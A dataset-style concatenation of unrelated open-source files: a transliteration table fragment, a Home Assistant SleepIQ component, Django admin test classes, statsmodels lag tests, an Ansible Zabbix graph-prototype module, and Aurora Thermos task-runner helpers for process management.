'Guan ', # 0x84
'Sukumo ', # 0x85
'Xue ', # 0x86
'Chan ', # 0x87
'Kai ', # 0x88
'Kui ', # 0x89
'[?] ', # 0x8a
'Jiang ', # 0x8b
'Lou ', # 0x8c
'Wei ', # 0x8d
'Pai ', # 0x8e
'[?] ', # 0x8f
'Sou ', # 0x90
'Yin ', # 0x91
'Shi ', # 0x92
'Chun ', # 0x93
'Shi ', # 0x94
'Yun ', # 0x95
'Zhen ', # 0x96
'Lang ', # 0x97
'Nu ', # 0x98
'Meng ', # 0x99
'He ', # 0x9a
'Que ', # 0x9b
'Suan ', # 0x9c
'Yuan ', # 0x9d
'Li ', # 0x9e
'Ju ', # 0x9f
'Xi ', # 0xa0
'Pang ', # 0xa1
'Chu ', # 0xa2
'Xu ', # 0xa3
'Tu ', # 0xa4
'Liu ', # 0xa5
'Wo ', # 0xa6
'Zhen ', # 0xa7
'Qian ', # 0xa8
'Zu ', # 0xa9
'Po ', # 0xaa
'Cuo ', # 0xab
'Yuan ', # 0xac
'Chu ', # 0xad
'Yu ', # 0xae
'Kuai ', # 0xaf
'Pan ', # 0xb0
'Pu ', # 0xb1
'Pu ', # 0xb2
'Na ', # 0xb3
'Shuo ', # 0xb4
'Xi ', # 0xb5
'Fen ', # 0xb6
'Yun ', # 0xb7
'Zheng ', # 0xb8
'Jian ', # 0xb9
'Ji ', # 0xba
'Ruo ', # 0xbb
'Cang ', # 0xbc
'En ', # 0xbd
'Mi ', # 0xbe
'Hao ', # 0xbf
'Sun ', # 0xc0
'Zhen ', # 0xc1
'Ming ', # 0xc2
'Sou ', # 0xc3
'Xu ', # 0xc4
'Liu ', # 0xc5
'Xi ', # 0xc6
'Gu ', # 0xc7
'Lang ', # 0xc8
'Rong ', # 0xc9
'Weng ', # 0xca
'Gai ', # 0xcb
'Cuo ', # 0xcc
'Shi ', # 0xcd
'Tang ', # 0xce
'Luo ', # 0xcf
'Ru ', # 0xd0
'Suo ', # 0xd1
'Xian ', # 0xd2
'Bei ', # 0xd3
'Yao ', # 0xd4
'Gui ', # 0xd5
'Bi ', # 0xd6
'Zong ', # 0xd7
'Gun ', # 0xd8
'Za ', # 0xd9
'Xiu ', # 0xda
'Ce ', # 0xdb
'Hai ', # 0xdc
'Lan ', # 0xdd
'[?] ', # 0xde
'Ji ', # 0xdf
'Li ', # 0xe0
'Can ', # 0xe1
'Lang ', # 0xe2
'Yu ', # 0xe3
'[?] ', # 0xe4
'Ying ', # 0xe5
'Mo ', # 0xe6
'Diao ', # 0xe7
'Tiao ', # 0xe8
'Mao ', # 0xe9
'Tong ', # 0xea
'Zhu ', # 0xeb
'Peng ', # 0xec
'An ', # 0xed
'Lian ', # 0xee
'Cong ', # 0xef
'Xi ', # 0xf0
'Ping ', # 0xf1
'Qiu ', # 0xf2
'Jin ', # 0xf3
'Chun ', # 0xf4
'Jie ', # 0xf5
'Wei ', # 0xf6
'Tui ', # 0xf7
'Cao ', # 0xf8
'Yu ', # 0xf9
'Yi ', # 0xfa
'Ji ', # 0xfb
'Liao ', # 0xfc
'Bi ', # 0xfd
'Lu ', # 0xfe
'Su ', # 0xff
)
| gpl-3.0 | -7,254,953,113,444,465,000 | 17.007752 | 24 | 0.387215 | false |
florianholzapfel/home-assistant | homeassistant/components/sleepiq.py | 15 | 3418 | """
Support for SleepIQ from SleepNumber.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sleepiq/
"""
import logging
from datetime import timedelta
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers import discovery
from homeassistant.helpers.entity import Entity
from homeassistant.const import CONF_USERNAME, CONF_PASSWORD
from homeassistant.util import Throttle
from requests.exceptions import HTTPError
DOMAIN = 'sleepiq'
REQUIREMENTS = ['sleepyq==0.6']
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=30)
IS_IN_BED = 'is_in_bed'
SLEEP_NUMBER = 'sleep_number'
SENSOR_TYPES = {
SLEEP_NUMBER: 'SleepNumber',
IS_IN_BED: 'Is In Bed',
}
LEFT = 'left'
RIGHT = 'right'
SIDES = [LEFT, RIGHT]
_LOGGER = logging.getLogger(__name__)
DATA = None
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
}),
}, extra=vol.ALLOW_EXTRA)
def setup(hass, config):
"""Setup SleepIQ.
Will automatically load sensor components to support
devices discovered on the account.
"""
# pylint: disable=global-statement
global DATA
from sleepyq import Sleepyq
username = config[DOMAIN][CONF_USERNAME]
password = config[DOMAIN][CONF_PASSWORD]
client = Sleepyq(username, password)
try:
DATA = SleepIQData(client)
DATA.update()
except HTTPError:
message = """
SleepIQ failed to login, double check your username and password"
"""
_LOGGER.error(message)
return False
discovery.load_platform(hass, 'sensor', DOMAIN, {}, config)
discovery.load_platform(hass, 'binary_sensor', DOMAIN, {}, config)
return True
class SleepIQData(object):
"""Gets the latest data from SleepIQ."""
def __init__(self, client):
"""Initialize the data object."""
self._client = client
self.beds = {}
self.update()
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
"""Get the latest data from SleepIQ."""
self._client.login()
beds = self._client.beds_with_sleeper_status()
self.beds = {bed.bed_id: bed for bed in beds}
class SleepIQSensor(Entity):
"""Implementation of a SleepIQ sensor."""
def __init__(self, sleepiq_data, bed_id, side):
"""Initialize the sensor."""
self._bed_id = bed_id
self._side = side
self.sleepiq_data = sleepiq_data
self.side = None
self.bed = None
# added by subclass
self._name = None
self.type = None
@property
def name(self):
"""Return the name of the sensor."""
return 'SleepNumber {} {} {}'.format(self.bed.name,
self.side.sleeper.first_name,
self._name)
def update(self):
"""Get the latest data from SleepIQ and updates the states."""
# Call the API for new sleepiq data. Each sensor will re-trigger this
# same exact call, but thats fine. We cache results for a short period
# of time to prevent hitting API limits.
self.sleepiq_data.update()
self.bed = self.sleepiq_data.beds[self._bed_id]
self.side = getattr(self.bed, self._side)
| mit | 2,832,404,081,076,921,300 | 25.913386 | 78 | 0.633996 | false |
keedio/hue | desktop/core/ext-py/Django-1.6.10/tests/admin_changelist/admin.py | 52 | 3133 | from __future__ import absolute_import
from django.contrib import admin
from django.core.paginator import Paginator
from .models import (Event, Child, Parent, Genre, Band, Musician, Group,
Quartet, Membership, ChordsMusician, ChordsBand, Invitation, Swallow)
site = admin.AdminSite(name="admin")
class CustomPaginator(Paginator):
def __init__(self, queryset, page_size, orphans=0, allow_empty_first_page=True):
super(CustomPaginator, self).__init__(queryset, 5, orphans=2,
allow_empty_first_page=allow_empty_first_page)
class EventAdmin(admin.ModelAdmin):
list_display = ['event_date_func']
def event_date_func(self, event):
return event.date
site.register(Event, EventAdmin)
class ParentAdmin(admin.ModelAdmin):
list_filter = ['child__name']
search_fields = ['child__name']
class ChildAdmin(admin.ModelAdmin):
list_display = ['name', 'parent']
list_per_page = 10
list_filter = ['parent', 'age']
def get_queryset(self, request):
return super(ChildAdmin, self).get_queryset(request).select_related("parent__name")
class CustomPaginationAdmin(ChildAdmin):
paginator = CustomPaginator
class FilteredChildAdmin(admin.ModelAdmin):
list_display = ['name', 'parent']
list_per_page = 10
def get_queryset(self, request):
return super(FilteredChildAdmin, self).get_queryset(request).filter(
name__contains='filtered')
class BandAdmin(admin.ModelAdmin):
list_filter = ['genres']
class GroupAdmin(admin.ModelAdmin):
list_filter = ['members']
class QuartetAdmin(admin.ModelAdmin):
list_filter = ['members']
class ChordsBandAdmin(admin.ModelAdmin):
list_filter = ['members']
class InvitationAdmin(admin.ModelAdmin):
list_display = ('band', 'player')
list_select_related = ('player',)
class DynamicListDisplayChildAdmin(admin.ModelAdmin):
list_display = ('parent', 'name', 'age')
def get_list_display(self, request):
my_list_display = super(DynamicListDisplayChildAdmin, self).get_list_display(request)
if request.user.username == 'noparents':
my_list_display = list(my_list_display)
my_list_display.remove('parent')
return my_list_display
class DynamicListDisplayLinksChildAdmin(admin.ModelAdmin):
list_display = ('parent', 'name', 'age')
list_display_links = ['parent', 'name']
def get_list_display_links(self, request, list_display):
return ['age']
site.register(Child, DynamicListDisplayChildAdmin)
class SwallowAdmin(admin.ModelAdmin):
actions = None # prevent ['action_checkbox'] + list(list_display)
list_display = ('origin', 'load', 'speed')
site.register(Swallow, SwallowAdmin)
class DynamicListFilterChildAdmin(admin.ModelAdmin):
list_filter = ('parent', 'name', 'age')
def get_list_filter(self, request):
my_list_filter = super(DynamicListFilterChildAdmin, self).get_list_filter(request)
if request.user.username == 'noparents':
my_list_filter = list(my_list_filter)
my_list_filter.remove('parent')
return my_list_filter
| apache-2.0 | -7,460,381,594,641,713,000 | 27.743119 | 93 | 0.68752 | false |
nguyentu1602/statsmodels | statsmodels/stats/tests/test_groups_sw.py | 34 | 2750 | # -*- coding: utf-8 -*-
"""Test for a helper function for PanelHAC robust covariance
the functions should be rewritten to make it more efficient
Created on Thu May 17 21:09:41 2012
Author: Josef Perktold
"""
import numpy as np
from numpy.testing import assert_equal, assert_raises
import statsmodels.stats.sandwich_covariance as sw
from statsmodels.tools.grouputils import Group, GroupSorted
class CheckPanelLagMixin(object):
def calculate(self):
self.g = g = GroupSorted(self.gind) # pylint: disable-msg=W0201
self.alla = [(lag, sw.lagged_groups(self.x, lag, g.groupidx)) # pylint: disable-msg=W0201
for lag in range(5)]
def test_values(self):
for lag, (y0, ylag) in self.alla:
assert_equal(y0, self.alle[lag].T)
assert_equal(y0, ylag + lag)
def test_raises(self):
mlag = self.mlag
assert_raises(ValueError, sw.lagged_groups, self.x, mlag,
self.g.groupidx)
class TestBalanced(CheckPanelLagMixin):
def __init__(self):
self.gind = np.repeat([0,1,2], 5)
self.mlag = 5
x = np.arange(15)
x += 10**self.gind
self.x = x[:,None]
#expected result
self.alle = {
0 : np.array([[ 1, 2, 3, 4, 5, 15, 16, 17, 18, 19,
110, 111, 112, 113, 114]]),
1 : np.array([[ 2, 3, 4, 5, 16, 17, 18, 19, 111, 112,
113, 114]]),
2 : np.array([[ 3, 4, 5, 17, 18, 19, 112, 113, 114]]),
3 : np.array([[ 4, 5, 18, 19, 113, 114]]),
4 : np.array([[ 5, 19, 114]])
}
self.calculate()
class TestUnBalanced(CheckPanelLagMixin):
def __init__(self):
self.gind = gind = np.repeat([0,1,2], [3, 5, 10])
self.mlag = 10 #maxlag
x = np.arange(18)
x += 10**gind
self.x = x[:,None]
#expected result
self.alle = {
0 : np.array([[ 1, 2, 3, 13, 14, 15, 16, 17, 108, 109,
110, 111, 112, 113, 114, 115, 116, 117]]),
1 : np.array([[ 2, 3, 14, 15, 16, 17, 109, 110, 111, 112,
113, 114, 115, 116, 117]]),
2 : np.array([[ 3, 15, 16, 17, 110, 111, 112, 113, 114, 115,
116, 117]]),
3 : np.array([[ 16, 17, 111, 112, 113, 114, 115, 116, 117]]),
4 : np.array([[ 17, 112, 113, 114, 115, 116, 117]]),
5 : np.array([[113, 114, 115, 116, 117]]),
}
self.calculate()
if __name__ == '__main__':
import nose
nose.runmodule(argv=[__file__, '-vvs', '-x', '--pdb-failures'], exit=False)
| bsd-3-clause | -2,665,996,803,205,696,000 | 34.25641 | 98 | 0.494545 | false |
markusappel/McCode | tools/Python/www/www-django/mcwww/mcwww/wsgi.py | 3 | 1132 | """
WSGI config for mcwww project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mcwww.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| gpl-2.0 | -8,129,405,261,898,038,000 | 39.428571 | 79 | 0.79947 | false |
drewandersonnz/openshift-tools | ansible/roles/lib_zabbix/library/zbx_graphprototype.py | 16 | 10207 | #!/usr/bin/env python
'''
Ansible module for zabbix graphprototypes
'''
# vim: expandtab:tabstop=4:shiftwidth=4
#
# Zabbix graphprototypes ansible module
#
#
# Copyright 2015 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#---
#- hosts: localhost
# gather_facts: no
# tasks:
# - zbx_graphprototype:
# zbx_server: https://zabbixserver/zabbix/api_jsonrpc.php
# zbx_user: Admin
# zbx_password: zabbix
# name: Test Graph
# height: 300
# width: 500
# graph_items:
# - item_name: Bytes per second IN on network interface {#OSO_NET_INTERFACE}
# color: red
# line_style: bold
# item_type: prototype
# - item_name: Template OS Linux: Bytes per second OUT on network interface {#OSO_NET_INTERFACE}
# item_type: prototype
#
#
# This is in place because each module looks similar to each other.
# These need duplicate code as their behavior is very similar
# but different for each zabbix class.
# pylint: disable=duplicate-code
# pylint: disable=import-error
from openshift_tools.zbxapi import ZabbixAPI, ZabbixConnection
def exists(content, key='result'):
''' Check if key exists in content or the size of content[key] > 0
'''
if not content.has_key(key):
return False
if not content[key]:
return False
return True
def get_graph_type(graphtype):
'''
Possible values:
0 - normal;
1 - stacked;
2 - pie;
3 - exploded;
'''
gtype = 0
if 'stacked' in graphtype:
gtype = 1
elif 'pie' in graphtype:
gtype = 2
elif 'exploded' in graphtype:
gtype = 3
return gtype
def get_show_legend(show_legend):
'''Get the value for show_legend
0 - hide
1 - (default) show
'''
rval = 1
if 'hide' == show_legend:
rval = 0
return rval
def get_template_id(zapi, template_name):
'''
get related templates
'''
# Fetch templates by name
content = zapi.get_content('template',
'get',
{'filter': {'host': template_name},})
if content.has_key('result'):
return content['result'][0]['templateid']
return None
def get_color(color_in='black'):
''' Receive a color and translate it to a hex representation of the color
Will have a few setup by default
'''
colors = {'black': '000000',
'red': 'FF0000',
'pink': 'FFC0CB',
'purple': '800080',
'orange': 'FFA500',
'gold': 'FFD700',
'yellow': 'FFFF00',
'green': '008000',
'cyan': '00FFFF',
'aqua': '00FFFF',
'blue': '0000FF',
'brown': 'A52A2A',
'gray': '808080',
'grey': '808080',
'silver': 'C0C0C0',
}
if colors.has_key(color_in):
return colors[color_in]
return color_in
def get_line_style(style):
'''determine the line style
'''
line_style = {'line': 0,
'filled': 1,
'bold': 2,
'dot': 3,
'dashed': 4,
'gradient': 5,
}
if line_style.has_key(style):
return line_style[style]
return 0
def get_calc_function(func):
'''Determine the caclulation function'''
rval = 2 # default to avg
if 'min' in func:
rval = 1
elif 'max' in func:
rval = 4
elif 'all' in func:
rval = 7
elif 'last' in func:
rval = 9
return rval
def get_graph_item_type(gtype):
'''Determine the graph item type
'''
rval = 0 # simple graph type
if 'sum' in gtype:
rval = 2
return rval
def get_graph_items(zapi, gitems):
'''Get graph items by id'''
r_items = []
for item in gitems:
content = zapi.get_content('item%s' % item.get('item_type', ''),
'get',
{'filter': {'name': item['item_name']}})
_ = item.pop('item_name')
color = get_color(item.pop('color', 'black'))
drawtype = get_line_style(item.get('line_style', 'line'))
func = get_calc_function(item.get('calc_func', 'avg'))
g_type = get_graph_item_type(item.get('graph_item_type', 'simple'))
if content.has_key('result'):
tmp = {'itemid': content['result'][0]['itemid'],
'color': color,
'drawtype': drawtype,
'calc_fnc': func,
'type': g_type,
}
r_items.append(tmp)
return r_items
def compare_gitems(zabbix_items, user_items):
'''Compare zabbix results with the user's supplied items
return True if user_items are equal
return False if any of the values differ
'''
if len(zabbix_items) != len(user_items):
return False
for u_item in user_items:
for z_item in zabbix_items:
if u_item['itemid'] == z_item['itemid']:
if not all([str(value) == z_item[key] for key, value in u_item.items()]):
return False
return True
# The branches are needed for CRUD and error handling
# pylint: disable=too-many-branches
def main():
'''
ansible zabbix module for zbx_graphprototypes
'''
module = AnsibleModule(
argument_spec=dict(
zbx_server=dict(default='https://localhost/zabbix/api_jsonrpc.php', type='str'),
zbx_user=dict(default=os.environ.get('ZABBIX_USER', None), type='str'),
zbx_password=dict(default=os.environ.get('ZABBIX_PASSWORD', None), type='str'),
zbx_debug=dict(default=False, type='bool'),
name=dict(default=None, type='str'),
height=dict(default=None, type='int'),
width=dict(default=None, type='int'),
graph_type=dict(default='normal', type='str'),
show_legend=dict(default='show', type='str'),
state=dict(default='present', type='str'),
graph_items=dict(default=None, type='list'),
),
#supports_check_mode=True
)
zapi = ZabbixAPI(ZabbixConnection(module.params['zbx_server'],
module.params['zbx_user'],
module.params['zbx_password'],
module.params['zbx_debug']))
#Set the instance and the template for the rest of the calls
zbx_class_name = 'graphprototype'
state = module.params['state']
content = zapi.get_content(zbx_class_name,
'get',
{'filter': {'name': module.params['name']},
#'templateids': templateid,
'selectGraphItems': 'extend',
})
#******#
# GET
#******#
if state == 'list':
module.exit_json(changed=False, results=content['result'], state="list")
#******#
# DELETE
#******#
if state == 'absent':
if not exists(content):
module.exit_json(changed=False, state="absent")
content = zapi.get_content(zbx_class_name, 'delete', [content['result'][0]['graphid']])
module.exit_json(changed=True, results=content['result'], state="absent")
# Create and Update
if state == 'present':
params = {'name': module.params['name'],
'height': module.params['height'],
'width': module.params['width'],
'graphtype': get_graph_type(module.params['graph_type']),
'show_legend': get_show_legend(module.params['show_legend']),
'gitems': get_graph_items(zapi, module.params['graph_items']),
}
# Remove any None valued params
_ = [params.pop(key, None) for key in params.keys() if params[key] is None]
#******#
# CREATE
#******#
if not exists(content):
content = zapi.get_content(zbx_class_name, 'create', params)
if content.has_key('error'):
module.exit_json(failed=True, changed=True, results=content['error'], state="present")
module.exit_json(changed=True, results=content['result'], state='present')
########
# UPDATE
########
differences = {}
zab_results = content['result'][0]
for key, value in params.items():
if key == 'gitems':
if not compare_gitems(zab_results[key], value):
differences[key] = value
elif zab_results[key] != value and zab_results[key] != str(value):
differences[key] = value
if not differences:
module.exit_json(changed=False, results=zab_results, state="present")
# We have differences and need to update
differences['graphid'] = zab_results['graphid']
content = zapi.get_content(zbx_class_name, 'update', differences)
if content.has_key('error'):
module.exit_json(failed=True, changed=False, results=content['error'], state="present")
module.exit_json(changed=True, results=content['result'], state="present")
module.exit_json(failed=True,
changed=False,
results='Unknown state passed. %s' % state,
state="unknown")
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import, locally-disabled
# import module snippets. This are required
from ansible.module_utils.basic import *
main()
| apache-2.0 | -5,983,438,661,443,240,000 | 29.836858 | 102 | 0.549721 | false |
protochron/aurora | src/main/python/apache/thermos/core/helper.py | 7 | 14943 | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import errno
import os
import signal
import time
from contextlib import closing
import psutil
from twitter.common import log
from twitter.common.dirutil import lock_file, safe_mkdir
from twitter.common.quantity import Amount, Time
from twitter.common.recordio import ThriftRecordWriter
from apache.thermos.common.ckpt import CheckpointDispatcher
from apache.thermos.common.path import TaskPath
from gen.apache.thermos.ttypes import ProcessState, ProcessStatus, RunnerCkpt, TaskState, TaskStatus
class TaskRunnerHelper(object):
"""
TaskRunner helper methods that can be operated directly upon checkpoint
state. These operations do not require knowledge of the underlying
task.
TaskRunnerHelper is sort of a mishmash of "checkpoint-only" operations and
the "Process Platform" stuff that started to get pulled into process.py
This really needs some hard design thought to see if it can be extracted out
even further.
"""
class Error(Exception): pass
class PermissionError(Error): pass
# Maximum drift between when the system says a task was forked and when we checkpointed
# its fork_time (used as a heuristic to determine a forked task is really ours instead of
# a task with coincidentally the same PID but just wrapped around.)
MAX_START_TIME_DRIFT = Amount(10, Time.SECONDS)
@staticmethod
def get_actual_user():
import getpass, pwd
try:
pwd_entry = pwd.getpwuid(os.getuid())
except KeyError:
return getpass.getuser()
return pwd_entry[0]
@staticmethod
def process_from_name(task, process_name):
if task.has_processes():
for process in task.processes():
if process.name().get() == process_name:
return process
return None
@classmethod
def this_is_really_our_pid(cls, process, uid, user, start_time):
"""
A heuristic to make sure that this is likely the pid that we own/forked. Necessary
because of pid-space wrapping. We don't want to go and kill processes we don't own,
especially if the killer is running as root.
process: psutil.Process representing the process to check
uid: uid expected to own the process (or None if not available)
user: username expected to own the process
start_time: time at which it's expected the process has started
Raises:
psutil.NoSuchProcess - if the Process supplied no longer exists
"""
process_create_time = process.create_time()
if abs(start_time - process_create_time) >= cls.MAX_START_TIME_DRIFT.as_(Time.SECONDS):
log.info("Expected pid %s start time to be %s but it's %s" % (
process.pid, start_time, process_create_time))
return False
if uid is not None:
# If the uid was provided, it is gospel, so do not consider user.
try:
uids = process.uids()
if uids is None:
return False
process_uid = uids.real
except psutil.Error:
return False
if process_uid == uid:
return True
else:
log.info("Expected pid %s to be ours but the pid uid is %s and we're %s" % (
process.pid, process_uid, uid))
return False
try:
process_user = process.username()
except KeyError:
return False
if process_user == user:
# If the uid was not provided, we must use user -- which is possibly flaky if the
# user gets deleted from the system, so process_user will be None and we must
# return False.
log.info("Expected pid %s to be ours but the pid user is %s and we're %s" % (
process.pid, process_user, user))
return True
return False
@classmethod
def scan_process(cls, state, process_name):
"""
Given a RunnerState and a process_name, return the following:
(coordinator pid, process pid, process tree)
(int or None, int or None, set)
"""
process_run = state.processes[process_name][-1]
user, uid = state.header.user, state.header.uid
coordinator_pid, pid, tree = None, None, set()
if uid is None:
log.debug('Legacy thermos checkpoint stream detected, user = %s' % user)
if process_run.coordinator_pid:
try:
coordinator_process = psutil.Process(process_run.coordinator_pid)
if cls.this_is_really_our_pid(coordinator_process, uid, user, process_run.fork_time):
coordinator_pid = process_run.coordinator_pid
except psutil.NoSuchProcess:
log.info(' Coordinator %s [pid: %s] completed.' % (process_run.process,
process_run.coordinator_pid))
except psutil.Error as err:
log.warning(' Error gathering information on pid %s: %s' % (process_run.coordinator_pid,
err))
if process_run.pid:
try:
process = psutil.Process(process_run.pid)
if cls.this_is_really_our_pid(process, uid, user, process_run.start_time):
pid = process.pid
except psutil.NoSuchProcess:
log.info(' Process %s [pid: %s] completed.' % (process_run.process, process_run.pid))
except psutil.Error as err:
log.warning(' Error gathering information on pid %s: %s' % (process_run.pid, err))
else:
if pid:
try:
tree = set(child.pid for child in process.children(recursive=True))
except psutil.Error:
log.warning(' Error gathering information on children of pid %s' % pid)
return (coordinator_pid, pid, tree)
@classmethod
def scan_tree(cls, state):
"""
Scan the process tree associated with the provided task state.
Returns a dictionary of process name => (coordinator pid, pid, pid children)
If the coordinator is no longer active, coordinator pid will be None. If the
forked process is no longer active, pid will be None and its children will be
an empty set.
"""
return dict((process_name, cls.scan_process(state, process_name))
for process_name in state.processes)
@classmethod
def safe_signal(cls, pid, sig=signal.SIGTERM):
try:
os.kill(pid, sig)
except OSError as e:
if e.errno not in (errno.ESRCH, errno.EPERM):
log.error('Unexpected error in os.kill: %s' % e)
except Exception as e:
log.error('Unexpected error in os.kill: %s' % e)
@classmethod
def terminate_pid(cls, pid):
cls.safe_signal(pid, signal.SIGTERM)
@classmethod
def kill_pid(cls, pid):
cls.safe_signal(pid, signal.SIGKILL)
@classmethod
def kill_group(cls, pgrp):
cls.safe_signal(-pgrp, signal.SIGKILL)
@classmethod
def _get_process_tuple(cls, state, process_name):
assert process_name in state.processes and len(state.processes[process_name]) > 0
return cls.scan_process(state, process_name)
@classmethod
def _get_coordinator_group(cls, state, process_name):
assert process_name in state.processes and len(state.processes[process_name]) > 0
return state.processes[process_name][-1].coordinator_pid
@classmethod
def terminate_process(cls, state, process_name):
log.debug('TaskRunnerHelper.terminate_process(%s)' % process_name)
_, pid, _ = cls._get_process_tuple(state, process_name)
if pid:
log.debug(' => SIGTERM pid %s' % pid)
cls.terminate_pid(pid)
return bool(pid)
@classmethod
def kill_process(cls, state, process_name):
log.debug('TaskRunnerHelper.kill_process(%s)' % process_name)
coordinator_pgid = cls._get_coordinator_group(state, process_name)
coordinator_pid, pid, tree = cls._get_process_tuple(state, process_name)
# This is super dangerous. TODO(wickman) Add a heuristic that determines
# that 1) there are processes that currently belong to this process group
# and 2) those processes have inherited the coordinator checkpoint filehandle
# This way we validate that it is in fact the process group we expect.
if coordinator_pgid:
log.debug(' => SIGKILL coordinator group %s' % coordinator_pgid)
cls.kill_group(coordinator_pgid)
if coordinator_pid:
log.debug(' => SIGKILL coordinator %s' % coordinator_pid)
cls.kill_pid(coordinator_pid)
if pid:
log.debug(' => SIGKILL pid %s' % pid)
cls.kill_pid(pid)
for child in tree:
log.debug(' => SIGKILL child %s' % child)
cls.kill_pid(child)
return bool(coordinator_pid or pid or tree)
@classmethod
def kill_runner(cls, state):
log.debug('TaskRunnerHelper.kill_runner()')
if not state or not state.statuses:
raise cls.Error('Could not read state!')
pid = state.statuses[-1].runner_pid
if pid == os.getpid():
raise cls.Error('Unwilling to commit seppuku.')
try:
os.kill(pid, signal.SIGKILL)
return True
except OSError as e:
if e.errno == errno.EPERM:
# Permission denied
return False
elif e.errno == errno.ESRCH:
# pid no longer exists
return True
raise
@classmethod
def open_checkpoint(cls, filename, force=False, state=None):
"""
Acquire a locked checkpoint stream.
"""
safe_mkdir(os.path.dirname(filename))
fp = lock_file(filename, "a+")
if fp in (None, False):
if force:
log.info('Found existing runner, forcing leadership forfeit.')
state = state or CheckpointDispatcher.from_file(filename)
if cls.kill_runner(state):
log.info('Successfully killed leader.')
# TODO(wickman) Blocking may not be the best idea here. Perhaps block up to
# a maximum timeout. But blocking is necessary because os.kill does not immediately
# release the lock if we're in force mode.
fp = lock_file(filename, "a+", blocking=True)
else:
log.error('Found existing runner, cannot take control.')
if fp in (None, False):
raise cls.PermissionError('Could not open locked checkpoint: %s, lock_file = %s' %
(filename, fp))
ckpt = ThriftRecordWriter(fp)
ckpt.set_sync(True)
return ckpt
@classmethod
def kill(cls, task_id, checkpoint_root, force=False,
terminal_status=TaskState.KILLED, clock=time):
"""
An implementation of Task killing that doesn't require a fully hydrated TaskRunner object.
Terminal status must be either KILLED or LOST state.
"""
if terminal_status not in (TaskState.KILLED, TaskState.LOST):
raise cls.Error('terminal_status must be KILLED or LOST (got %s)' %
TaskState._VALUES_TO_NAMES.get(terminal_status) or terminal_status)
pathspec = TaskPath(root=checkpoint_root, task_id=task_id)
checkpoint = pathspec.getpath('runner_checkpoint')
state = CheckpointDispatcher.from_file(checkpoint)
if state is None or state.header is None or state.statuses is None:
if force:
log.error('Task has uninitialized TaskState - forcibly finalizing')
cls.finalize_task(pathspec)
return
else:
log.error('Cannot update states in uninitialized TaskState!')
return
ckpt = cls.open_checkpoint(checkpoint, force=force, state=state)
def write_task_state(state):
update = TaskStatus(state=state, timestamp_ms=int(clock.time() * 1000),
runner_pid=os.getpid(), runner_uid=os.getuid())
ckpt.write(RunnerCkpt(task_status=update))
def write_process_status(status):
ckpt.write(RunnerCkpt(process_status=status))
if cls.is_task_terminal(state.statuses[-1].state):
log.info('Task is already in terminal state! Finalizing.')
cls.finalize_task(pathspec)
return
with closing(ckpt):
write_task_state(TaskState.ACTIVE)
for process, history in state.processes.items():
process_status = history[-1]
if not cls.is_process_terminal(process_status.state):
if cls.kill_process(state, process):
write_process_status(ProcessStatus(process=process,
state=ProcessState.KILLED, seq=process_status.seq + 1, return_code=-9,
stop_time=clock.time()))
else:
if process_status.state is not ProcessState.WAITING:
write_process_status(ProcessStatus(process=process,
state=ProcessState.LOST, seq=process_status.seq + 1))
write_task_state(terminal_status)
cls.finalize_task(pathspec)
@classmethod
def reap_children(cls):
pids = set()
while True:
try:
pid, status, rusage = os.wait3(os.WNOHANG)
if pid == 0:
break
pids.add(pid)
log.debug('Detected terminated process: pid=%s, status=%s, rusage=%s' % (
pid, status, rusage))
except OSError as e:
if e.errno != errno.ECHILD:
log.warning('Unexpected error when calling waitpid: %s' % e)
break
return pids
TERMINAL_PROCESS_STATES = frozenset([
ProcessState.SUCCESS,
ProcessState.KILLED,
ProcessState.FAILED,
ProcessState.LOST])
TERMINAL_TASK_STATES = frozenset([
TaskState.SUCCESS,
TaskState.FAILED,
TaskState.KILLED,
TaskState.LOST])
@classmethod
def is_process_terminal(cls, process_status):
return process_status in cls.TERMINAL_PROCESS_STATES
@classmethod
def is_task_terminal(cls, task_status):
return task_status in cls.TERMINAL_TASK_STATES
@classmethod
def initialize_task(cls, spec, task):
active_task = spec.given(state='active').getpath('task_path')
finished_task = spec.given(state='finished').getpath('task_path')
is_active, is_finished = os.path.exists(active_task), os.path.exists(finished_task)
if is_finished:
raise cls.Error('Cannot initialize task with "finished" record!')
if not is_active:
safe_mkdir(os.path.dirname(active_task))
with open(active_task, 'w') as fp:
fp.write(task)
@classmethod
def finalize_task(cls, spec):
active_task = spec.given(state='active').getpath('task_path')
finished_task = spec.given(state='finished').getpath('task_path')
is_active, is_finished = os.path.exists(active_task), os.path.exists(finished_task)
if not is_active:
raise cls.Error('Cannot finalize task with no "active" record!')
elif is_finished:
raise cls.Error('Cannot finalize task with "finished" record!')
safe_mkdir(os.path.dirname(finished_task))
os.rename(active_task, finished_task)
os.utime(finished_task, None)
